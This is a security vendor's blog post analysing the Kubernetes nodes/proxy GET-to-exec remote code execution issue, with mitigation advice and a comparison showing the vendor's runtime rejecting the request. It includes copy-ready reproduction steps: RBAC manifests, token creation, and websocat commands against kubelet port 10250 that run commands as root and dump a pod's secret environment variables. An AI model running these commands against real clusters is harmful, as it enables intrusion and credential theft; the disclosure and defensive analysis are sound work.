Your Monitoring Stack Just Became an RCE Vector: A Deep-Dive into the Kubernetes nodes/proxy RCE
Last week, security researcher Graham Helton published a report showing that a service account with nothing more than the nodes/proxy GET permission can achieve full remote code execution (RCE) in any container on a Kubernetes node. This permission is routinely granted to monitoring tools like Prometheus, Datadog, and Grafana for metrics collection. Depending on the security configuration, this can lead to a full cluster takeover.
We investigated whether workloads running under Edera's isolation were vulnerable. The short answer: they're not. But the longer answer is more interesting. It reveals why architectural decisions matter, why defense in depth isn't just a marketing buzzword, and why the Kubernetes community needs to think harder about secure defaults.
First, a Thank You to the Security Research Community
Before we dive in, we want to acknowledge Graham Helton's work. Security researchers who responsibly disclose vulnerabilities like this are heroes. They make the entire ecosystem safer, often without recognition or compensation. The Kubernetes community, and especially those of us running AI workloads, financial services, and healthcare applications, owes researchers like Graham a debt of gratitude.
If you haven't read Graham's original post, we encourage you to do so. It's thorough, serves as a great introduction to some Kubernetes internals, and provides important context for what follows.
How a Kubernetes GET Request Turns Into Full Remote Code Execution
To understand this vulnerability, we need to cover some background on how Kubernetes handles container execution and how WebSocket connections work.
How Kubernetes Exec Works
When you run kubectl exec -it my-pod -- /bin/bash, there’s a lot that happens under the hood:
- Your kubectl client sends a request to the Kubernetes API server
- The API server checks your RBAC permissions for pods/exec CREATE
- If authorized, the API server proxies your request to the kubelet's API endpoint on the node
- The kubelet connects to the container runtime (containerd, CRI-O, edera, etc.) to start the exec session
- A bidirectional stream is established for stdin/stdout/stderr
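You can watch the first part of this flow yourself by turning up kubectl's verbosity. A minimal sketch (the pod name is a placeholder, and the exact request shape depends on your kubectl version, since newer clients also use WebSockets toward the API server):
# -v=8 logs the HTTP requests kubectl makes to the API server
kubectl exec -v=8 my-pod -- id 2>&1 | grep "/exec"
# Expect a request against the pods/exec subresource, roughly:
#   .../api/v1/namespaces/default/pods/my-pod/exec?command=id&stdout=true&stderr=true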
The key word here is CREATE. Executing commands in a container is considered a write operation, so it requires the create verb on the pods/exec RBAC resource.
The WebSocket Protocol Primer
WebSocket is a protocol that enables bidirectional communication over a single TCP connection. It's used extensively in Kubernetes for familiar operations like exec, attach, and port-forward.
Crucially, WebSockets begin with an HTTP GET request. This is called the "upgrade handshake" and is defined in RFC 6455. The client sends a GET request with special headers, and the server responds with HTTP 101 (Switching Protocols) to upgrade the connection.
GET /exec/default/my-pod/container?command=id HTTP/1.1
Host: 10.0.0.5:10250
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Protocol: v4.channel.k8s.io
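If the handshake succeeds, the server's side of the exchange looks roughly like this (the Sec-WebSocket-Accept value below is the standard RFC 6455 response for the sample key above):
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
Sec-WebSocket-Protocol: v4.channel.k8s.io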
The RBAC and WebSocket Mismatch That Enables RCE
Here's where things get spicy:
- The kubelet maps HTTP methods to RBAC verbs: GET → get, POST → create
- The /exec endpoint normally expects POST requests
- But WebSocket connections use GET for the handshake
- The kubelet sees a GET request, checks for get permission, and allows it
- The connection upgrades, and suddenly you have an all-powerful exec session
Result: If you have nodes/proxy GET permission, you can bypass the pods/exec CREATE RBAC requirement entirely. This matters because of how organizations treat these two permissions:
- pods/exec CREATE is considered highly sensitive, and security teams rightly audit it carefully. It's typically restricted to cluster administrators, on-call engineers, or specific debugging roles. Granting it broadly is a red flag in any security review.
- nodes/proxy GET is considered read-only. It's routinely granted to monitoring tools, often across the entire cluster. Even mature security teams rarely take notice because it's typically just GET requests for metrics.
Read differently: your Prometheus service account, which you thought could only scrape metrics, can execute arbitrary commands as root in any container on any node it can reach.
A permission typically granted for observability becomes a permission for remote code execution.
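To see whether your own monitoring identities fall into this gap, you can check both permissions side by side. A quick sketch using impersonation (the monitoring namespace and prometheus service account name are placeholders; note the managed-platform caveat in Step 2 below):
# Can the monitoring service account reach the kubelet via nodes/proxy?
kubectl auth can-i get nodes/proxy --as=system:serviceaccount:monitoring:prometheus
# Does it also hold the permission security teams actually audit?
kubectl auth can-i create pods/exec --as=system:serviceaccount:monitoring:prometheus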
Why nodes/proxy Exists and How It Can Be Abused
The nodes/proxy resource allows direct communication with the kubelet API. It's generally used for:
- Metrics collection: Prometheus scraping /metrics and /stats
- Health monitoring: Tools checking node health status
- Log aggregation: Accessing container logs directly
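For comparison, this is what legitimate traffic over that permission usually looks like; a sketch using the API server's node proxy path (substitute a real node name):
# Scrape kubelet metrics through the API server's nodes/proxy subresource
kubectl get --raw "/api/v1/nodes/<node-name>/proxy/metrics" | head
# Pull the node's stats summary, another common monitoring target
kubectl get --raw "/api/v1/nodes/<node-name>/proxy/stats/summary" | head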
Many organizations grant this permission broadly to their observability stack. A typical ClusterRole looks like this:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
It's just GET. Read-only. What could go wrong? As it turns out, everything. And the Kubernetes maintainers have signaled that this is working as intended and won't be patched.
Why Kubernetes Considers nodes/proxy RCE “Working as Intended”
When this vulnerability was reported to the Kubernetes Security Team, they determined it is "working as intended" and will not receive a CVE. Their position is that nodes/proxy has always been a privileged resource, and the proper fix is KEP-2862 (Fine-Grained Kubelet API Authorization), expected to reach GA in Kubernetes 1.36 (April 2026).
Step-by-Step: Reproducing the nodes/proxy RCE
We built a test harness to validate this vulnerability in our environment. Here's how to reproduce it in yours.
Step 1: Create a Service Account with Minimal Permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: vuln-test-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: vuln-test-sa
  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: vuln-test-binding
subjects:
- kind: ServiceAccount
  name: vuln-test-sa
  namespace: default
roleRef:
  kind: ClusterRole
  name: vuln-test-role
  apiGroup: rbac.authorization.k8s.io
Step 2: Verify Permissions
# Generate a token for the service account
TOKEN=$(kubectl create token vuln-test-sa -n default --duration=1h)
# List permissions - look for "nodes/proxy" with "get" verb
kubectl auth can-i --list --token="$TOKEN" | grep nodes/proxy
# Expected output: nodes/proxy [] [] [get]
# Verify we do not have pods/exec permission
kubectl auth can-i create pods/exec --token="$TOKEN"
# Expected output: no
Note: On EKS and other managed Kubernetes platforms, kubectl auth can-i get nodes/proxy may incorrectly return "no" due to webhook authorizer limitations. Use kubectl auth can-i --list instead, which correctly shows the granted permissions.
Step 3: Deploy a Target Pod for Exploitation
apiVersion: v1
kind: Pod
metadata:
  name: victim
  namespace: default
spec:
  containers:
  - name: victim
    image: python:slim
    command: ["sleep", "infinity"]
    env:
    - name: SECRET_API_KEY
      value: "super-secret-key-12345"
    - name: DATABASE_PASSWORD
      value: "production-db-password"
Step 4: Exploit nodes/proxy for Remote Code Execution
From an attacker pod (or any machine with network access to the kubelet):
# Get a token for the service account
TOKEN=$(kubectl create token vuln-test-sa --duration=1h)
# Get the node's internal IP
NODE_IP=$(kubectl get node <node-name> -o jsonpath='{.status.addresses[?(@.type=="InternalIP")].address}')
# The exploit - using websocat to establish a WebSocket exec session
websocat -k \
-H "Authorization: Bearer $TOKEN" \
--protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=id"
Result on standard containers:
uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}
You now have RCE as root inside the container. From here, an attacker can:
- Extract environment variables (secrets, API keys, database credentials)
- Read mounted volumes (potentially including service account tokens)
- Make network requests to internal services
- Install persistence mechanisms
- Attempt container escape via kernel vulnerabilities
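For instance, the first item above is a one-line change to the same request: swap the command for env and the pod's secrets come back over the WebSocket (a sketch reusing the TOKEN and NODE_IP variables from Step 4):
websocat -k \
  -H "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
  "wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=env"
# Expect SECRET_API_KEY and DATABASE_PASSWORD from the victim pod spec in the output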
Testing the nodes/proxy RCE Against Edera
It's never a good feeling when your favorite distributed system is exposed to a massive remote code execution flaw.
At Edera, we build on top of, and harden, Kubernetes. So how did this vulnerability play out against our runtime? Did our microVM container execution environment limit the remote code execution to a single isolation domain?
To test, we deployed identical victim pods: one running on the standard containerd runtime and one running on Edera's edera runtime.
Exploit Result on a Standard Kubernetes Container Runtime
$ websocat -k --protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim-standard/victim?output=1&command=id"
uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}
Vulnerable. The attacker achieves RCE.
Exploit Result on an Edera-Isolated Container
$ websocat -k --protocol v4.channel.k8s.io \
"wss://${NODE_IP}:10250/exec/default/victim-edera/victim?output=1&command=id"
HTTP/1.1 405 Method Not Allowed
Allow: POST
The request is rejected before reaching the container. Not vulnerable 😮💨
Why Edera Is Protected
Let's be transparent: this protection is a beneficial side-effect of Edera's architecture, not a feature we specifically designed to counter this vulnerability.
Edera implements the Container Runtime Interface (CRI) differently than traditional runtimes. When the kubelet forwards an exec request to the Edera runtime, our streaming endpoint (written in Rust, with no Go components) only accepts POST requests. The WebSocket upgrade handshake, which arrives as a GET request, is rejected with HTTP 405 Method Not Allowed.
From the attacker's perspective, the request never gets far enough to establish a session. The runtime itself refuses to process it.
Comparing Exec Behavior Between Standard Runtimes and Edera
We can see this difference by testing the HTTP methods directly:
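A minimal sketch of that test, probing the kubelet's exec endpoint with plain HTTP requests (reusing NODE_IP and TOKEN from earlier; the exact status lines you see will vary by runtime and version):
# POST is the method the kubelet/runtime expects for exec
curl -sk -o /dev/null -w "POST: %{http_code}\n" -X POST \
  -H "Authorization: Bearer $TOKEN" \
  "https://${NODE_IP}:10250/exec/default/victim/victim?output=1&command=id"
# GET is the WebSocket upgrade path abused by this exploit
curl -sk -o /dev/null -w "GET:  %{http_code}\n" \
  -H "Authorization: Bearer $TOKEN" \
  "https://${NODE_IP}:10250/exec/default/victim/victim?output=1&command=id"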

Both runtimes support legitimate kubectl exec operations (which use POST through the API server). But only Edera blocks the direct WebSocket GET exploit.
But What If Edera Were Vulnerable?
This is where defense in depth becomes important. Let's imagine that Edera's exec endpoint did accept the WebSocket upgrade.
The attacker would land inside a microVM with its own dedicated kernel.
Comparing Blast Radius: Shared Kernel vs Isolated MicroVM
Standard container compromise: the attacker has RCE in a container sharing the host kernel.
- Can see all processes on the node via /proc (if not properly namespaced)
- Can potentially exploit kernel vulnerabilities to escape to the host
- Can access shared resources (cgroups, network namespaces) for lateral movement
- One compromised container can lead to a compromise of the entire node
Edera container compromise: the attacker has RCE inside an isolated microVM.
- Cannot see processes from other pods or the host, as there is no shared /proc
- Kernel exploits affect only that microVM's kernel, not the host
- No shared kernel memory, cgroups, or namespaces to abuse
- The blast radius is contained to a single workload
Why nodes/proxy RCE Is Especially Dangerous for AI Workloads
Organizations running AI inference services face a particular risk. These workloads often:
- Hold model weights worth millions in R&D investment
- Have access to GPU resources (high-value targets)
- Connect to data pipelines containing sensitive training data
- Run with elevated permissions for performance reasons
A single container compromise in a standard Kubernetes cluster could lead to model exfiltration, data theft, or corruption of inference results. With Edera's isolation, even a successful exec exploit cannot reach beyond the boundaries of the compromised microVM.
When Kubernetes Won’t Patch: Understanding the Real Risk
Earlier, we mentioned that the Kubernetes Security Team determined this behavior is "working as intended." Here's the full context of their response:
Following further review with SIG-Auth and SIG-Node, we are confirming our decision that this behavior is working as intended and will not be receiving a CVE. While we agree that nodes/proxy presents a risk, a patch to restrict this specific path would require changing authorization in both the kubelet (to special-case the /exec path) and the kube-apiserver (to add a secondary path inspection for /exec after mapping the overall path to nodes/proxy) to force a double authorization of “get” and “create.” We have determined that implementing and coordinating such double-authorization logic is brittle, architecturally incorrect, and potentially incomplete.
We remain confident that KEP-2862 (Fine-Grained Kubelet API Authorization) is the proper architectural resolution. Rather than changing the coarse-grained nodes/proxy authorization, our goal is to render it obsolete for monitoring agents by graduating fine-grained permissions to GA in release 1.36, expected in April 2026.
The Kubernetes Security Team
Why Kubernetes Rejects a Patch for nodes/proxy
The Kubernetes Security Team's reasoning is thoughtful:
- Architectural integrity: A targeted patch would require coordinated changes across multiple components with special-case logic. This is the kind of complexity that could lead to future vulnerabilities.
- Proper fix exists: KEP-2862 introduces fine-grained permissions (nodes/metrics, nodes/stats, nodes/log) that give monitoring tools least-privilege access without the exec capability.
- Deprecation path: Once KEP-2862 reaches GA and sees adoption, nodes/proxy can be deprecated for monitoring use cases.
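Once those fine-grained subresources are available on your clusters, a monitoring role could drop nodes/proxy entirely. A sketch of what that might look like (verify the exact resource names against your Kubernetes version and KEP-2862 before relying on it):
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-role-fine-grained
rules:
- apiGroups: [""]
  resources: ["nodes/metrics", "nodes/stats", "nodes/log"]
  verbs: ["get"]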
Why the Risk Has Changed Since nodes/proxy Was Designed
We understand the difficult tradeoffs the Kubernetes security team has to navigate for features with a large blast radius and complexity. KEP-2862 is genuinely the right long-term solution.
But we believe the risk calculus has changed.
KEP-2862 is expected to GA in April 2026. After that, it requires adoption across the entire ecosystem. Monitoring tools need to update their RBAC requirements, Helm charts need revision, and cluster operators need to migrate. Realistically, most production clusters won't have this protection until 2027 or later.
Kubernetes doesn’t just run stateless web apps. It's running AI training pipelines with proprietary model weights, financial trading systems, and healthcare applications with patient data. The blast radius of a monitoring stack compromise in 2026 is categorically different from 2016.
This vulnerability illustrates a difficult truth: you cannot rely solely on upstream security to protect your workloads. This is why architectural isolation matters. It's not about mitigating vulnerabilities, it's about building systems that remain resilient to compromise even when vulnerabilities exist, and even when patches aren't coming.
How Operators, Maintainers, and Vendors Should Respond
For cluster operators:
- Audit your RBAC policies for nodes/proxy permissions immediately
- Consider whether monitoring tools truly need direct kubelet access
- Implement network policies restricting access to kubelet port 10250
- Plan your migration to KEP-2862 fine-grained permissions when they GA
- Adopt workload isolation technologies that limit blast radius regardless of upstream decisions
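As a starting point for the first item, here is a quick way to list which ClusterRoles currently grant nodes/proxy (a sketch that assumes kubectl access and jq installed):
# Find ClusterRoles whose rules mention nodes/proxy
kubectl get clusterroles -o json | jq -r '
  .items[]
  | select([.rules[]?.resources[]?] | index("nodes/proxy"))
  | .metadata.name'
# Then trace those roles back to subjects via their bindings
kubectl get clusterrolebindings -o wide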
For the Kubernetes project:
- Prioritize KEP-2862 adoption and provide clear migration guides
- Consider whether new clusters should default to fine-grained authorization
- Document the security implications of nodes/proxy more prominently
For the industry:
- Recognize that the era of "detect and respond" is insufficient for container security
- Recognize that upstream maintainers, even excellent ones, cannot protect you from every threat
- Invest in isolation technologies that make successful exploits containable
- Assume vulnerabilities will exist, and architect systems to contain them
- Treat defense in depth as a requirement, not an option
nodes/proxy RCE Proves Why Architectural Isolation Matters
The nodes/proxy GET vulnerability is a reminder that distributed systems security is hard. Even benign permissions become attack vectors when combined with protocol idiosyncrasies. And sometimes, even when you report these issues, upstream maintainers make reasonable decisions that still leave your workloads exposed.
Edera happens to block this particular exploit due to architectural decisions in our CRI implementation. But the deeper lesson isn't "use Edera"; it's that defense in depth works. When you isolate workloads at the kernel level, even novel vulnerabilities become containable events rather than cluster-wide compromises.
The Kubernetes community has an opportunity to build systems that are resilient and secure by default. KEP-2862 is a step in the right direction. But until secure defaults are the norm, and even after they are, architectural isolation remains your last line of defense.
We hope this analysis contributes to that conversation and encourages the ecosystem to think beyond "patch or don't patch" and toward "how do we contain the blast radius when things go wrong?"
Thanks again to Graham Helton for the original vulnerability research.
Have questions or want to discuss isolation strategies? Reach out to us at security@edera.dev.
FAQ
What is the Kubernetes nodes/proxy RCE vulnerability?
The nodes/proxy RCE vulnerability allows attackers with GET access to nodes/proxy to establish WebSocket exec sessions and execute arbitrary commands inside containers.
Why is nodes/proxy considered dangerous?
Although often treated as read-only, nodes/proxy grants direct access to the kubelet API, which can be abused to bypass RBAC protections.
Are monitoring tools like Prometheus affected?
Yes. Monitoring tools are frequently granted nodes/proxy GET permissions, making them potential attack vectors if compromised.
Why won’t Kubernetes patch this vulnerability?
The Kubernetes Security Team considers this behavior “working as intended” and plans to address it through fine-grained kubelet authorization (KEP-2862).
How does isolation change the impact of this RCE?
With isolated runtimes, even successful exec exploits are contained within a single workload and cannot compromise the node or other pods.